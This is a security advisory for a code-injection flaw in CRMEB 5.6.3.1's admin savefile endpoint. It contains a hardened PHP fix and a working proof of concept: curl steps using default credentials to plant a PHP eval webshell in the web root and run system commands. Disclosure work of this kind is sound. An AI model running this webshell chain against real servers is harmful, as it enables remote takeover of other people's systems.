CRMEB 5.6.3.1 Code Injection Vulnerability #4

@cyl-love

Description

Supplier

https://github.com/crmeb/crmeb

Vulnerability File

app/adminapi/controller/v1/system/SystemFile.php

Vulnerability Type

Code Injection (CWE-94)

Severity

Critical

Describe

Code analysis

In the app/adminapi/controller/v1/system/SystemFile.php file, the savefile function allows administrators to write arbitrary content to any file path, enabling code injection attacks.

// Line 113-126
public function savefile()
{
    $comment = $this->request->param('comment');  // User-controlled content
    $filepath = $this->request->param('filepath');  // User-controlled path
    
    if (empty($filepath)) {
        return app('json')->fail('文件路径不存在');
    }
    
    // No validation of:
    // - File path (can write to any location)
    // - File content (can write PHP code)
    // - File extension (can create .php files)
    
    $res = $this->services->savefile($filepath, $comment);
    
    if ($res) {
        return app('json')->success('保存成功');
    }
    return app('json')->fail('保存失败');
}

The vulnerability exists because:

  1. No path validation - can write to any directory
  2. No content validation - can write arbitrary code
  3. No file extension restrictions - can create .php files
  4. No malicious code detection - can inject webshells
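As an added illustration of what those four missing checks look like when present (example code written for this report, not CRMEB's own code), the class below resolves a user-supplied path against a fixed template root, refuses traversal and absolute paths, enforces an extension allow-list, and rejects content containing a PHP open tag. The root directory, the allow-list and the assumption that the editor only needs to touch non-executable template files are assumptions for the example and would need adjusting to the deployment's real policy; PHP 8 is assumed for str_contains/str_starts_with.

```php
<?php
// Added example (not CRMEB's code): a hardened path/content check for a
// file-save endpoint like the one quoted above. Assumes the editor should
// only touch static/template files below one fixed directory; adjust
// ALLOWED_EXT and the root to the deployment's actual policy. Requires PHP 8.

declare(strict_types=1);

final class SafeFileSaver
{
    // Extension allow-list: never .php, .phtml, .phar, .htaccess, ...
    private const ALLOWED_EXT = ['html', 'htm', 'css', 'js', 'txt', 'json'];

    private string $root;

    public function __construct(string $root)
    {
        $real = realpath($root);
        if ($real === false || !is_dir($real)) {
            throw new InvalidArgumentException('root directory does not exist');
        }
        $this->root = rtrim($real, DIRECTORY_SEPARATOR);
    }

    /**
     * Resolve a user-supplied relative path to an absolute path inside $root,
     * or return null when the request should be rejected.
     */
    public function resolve(string $filepath): ?string
    {
        // Reject empty input, NUL bytes and absolute paths outright.
        if ($filepath === '' || str_contains($filepath, "\0")
            || $filepath[0] === '/' || $filepath[0] === '\\') {
            return null;
        }
        // Reject any "." or ".." component regardless of separator style.
        foreach (preg_split('#[\\\\/]+#', $filepath) as $part) {
            if ($part === '..' || $part === '.') {
                return null;
            }
        }

        $ext = strtolower(pathinfo($filepath, PATHINFO_EXTENSION));
        if (!in_array($ext, self::ALLOWED_EXT, true)) {
            return null;
        }

        // Canonicalise the parent directory (this follows symlinks) and confirm
        // it is still inside the root; the file itself may not exist yet.
        $parent = realpath($this->root . DIRECTORY_SEPARATOR . dirname($filepath));
        if ($parent === false
            || !str_starts_with($parent . DIRECTORY_SEPARATOR, $this->root . DIRECTORY_SEPARATOR)) {
            return null;
        }
        $target = $parent . DIRECTORY_SEPARATOR . basename($filepath);

        // If the target already exists it must be a regular file, not a symlink
        // pointing somewhere else.
        if (file_exists($target) && (is_link($target) || !is_file($target))) {
            return null;
        }
        return $target;
    }

    /**
     * Block any PHP open tag ("<?php", "<?=" and the bare short tag "<?") so
     * server-executable code cannot be smuggled into an allowed file type.
     * This deliberately also rejects "<?xml" prologs; relax only if needed.
     */
    public static function looksExecutable(string $content): bool
    {
        return preg_match('/<\?/', $content) === 1;
    }

    public function save(string $filepath, string $content): bool
    {
        $target = $this->resolve($filepath);
        if ($target === null || self::looksExecutable($content)) {
            return false;
        }
        return file_put_contents($target, $content, LOCK_EX) !== false;
    }
}

// Usage sketch (the root path is an assumption, not CRMEB's layout):
// $saver = new SafeFileSaver('/var/www/crmeb/template');
// var_dump($saver->resolve('../public/shell.php'));  // NULL: traversal and bad extension
// var_dump($saver->resolve('index.php'));            // NULL: extension not allowed
// var_dump($saver->resolve('theme/index.html'));     // absolute path when theme/ exists
// var_dump($saver->save('theme/index.html', '<?php echo 1;'));  // false: open tag blocked
```

The order of checks matters: the lexical traversal check runs before realpath() because realpath() only works on paths that exist, and the extension check runs on the original name so a trailing component like "shell.php" is refused before any filesystem access. Even with this in place, the endpoint should keep requiring the separate file-management token the report mentions, since the write still runs with the web server's privileges.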

POC

POST /adminapi/system/file/savefile HTTP/1.1
Host: target.com
Authorization: Bearer {admin_token}
Content-Type: application/json

{"filepath":"/var/www/public/shell.php","comment":"<?php @eval($_POST['cmd']);?>","fileToken":"{file_token}"}

Step 1: Login to get admin token

curl -X POST "http://target.com/adminapi/login" \
  -H "Content-Type: application/json" \
  -d '{"account":"admin","pwd":"admin123"}'

Step 2: Get file management token

curl -X POST "http://target.com/adminapi/system/file/login" \
  -H "Authorization: Bearer YOUR_ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"password":"123456"}'

Step 3: Write webshell

curl -X POST "http://target.com/adminapi/system/file/savefile" \
  -H "Authorization: Bearer YOUR_ADMIN_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"filepath":"/var/www/public/shell.php","comment":"<?php @eval($_POST[\"cmd\"]);?>","fileToken":"YOUR_FILE_TOKEN"}'

Step 4: Execute webshell

curl -X POST "http://target.com/shell.php" \
  -d "cmd=system('id');"

Result

Code injection confirmed. Can write webshell and execute arbitrary PHP code.

[*] Webshell written successfully
[*] Command execution confirmed
[*] Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

Impact

An attacker can:

  • Execute arbitrary PHP code on the server
  • Gain remote shell access
  • Read, modify, or delete any files
  • Access database credentials
  • Pivot to other internal systems
  • Fully compromise the server

Vendor Contact

admin@crmeb.com

References
